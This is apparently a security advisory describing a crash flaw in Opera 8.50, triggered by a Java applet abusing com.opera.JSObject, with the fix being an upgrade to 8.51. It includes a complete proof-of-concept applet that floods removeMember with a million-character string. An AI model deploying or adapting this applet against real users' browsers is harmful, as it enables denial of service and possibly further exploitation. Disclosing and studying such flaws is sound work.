|
|
|
|
| |
Opera is "a computer application for handling most common internet-related tasks, including: web browsing, sending and receiving messages, managing contacts and online chat".
A vulnerability in a Opera allows remote attackers to cause the program to crash by utilizing a malicious Java applet. |
| |
Credit:
The information has been provided by Marc Schoenefeld.
|
| |
Vulnerable Systems:
* Opera version 8.50
Immune Systems:
* Opera version 8.51
It is possible to crash the opera 8.50 browser with a simple java applet (see below). This was observed on Win32, Linux versions maybe affected, too.
This can be tested at:
http://www.illegalaccess.org/exploit/opera85/OperaApplet.html
As you can see the applet crashes at 0x67c0a54c. This is caused by a bug in a JNI routine implementing the com.opera.JSObject class. It cannot be ruled out, that this bug is exploitable.
The opera guys were informed on the 21st of September, and then again on 8th of October.
Fix:
Please upgrade to the new Opera 8.51, which does not expose this weakness.
import java.applet.Applet;
import java.awt.Graphics;
import netscape.javascript.JSObject;
public class OperaTest extends Applet{
static
{
System.out.println("Loaded 1.2");
}
public void paint(Graphics g)
{
System.out.println("start");
try {
netscape.javascript.JSObject jso = JSObject.getWindow(this);
System.out.println(jso.getClass());
com.opera.JSObject j = (com.opera.JSObject ) jso;
char[] x = new char[1000000];
for (int y = 0 ; y < x.length; y++) {
x [y] = 'A';
}
String z = new String(x);
System.out.println("after evalb");
j.removeMember(z);
System.out.println("after remove");
}
catch (Exception e) {
e.printStackTrace();
}
}
}
|
|
|
|
|
|
|
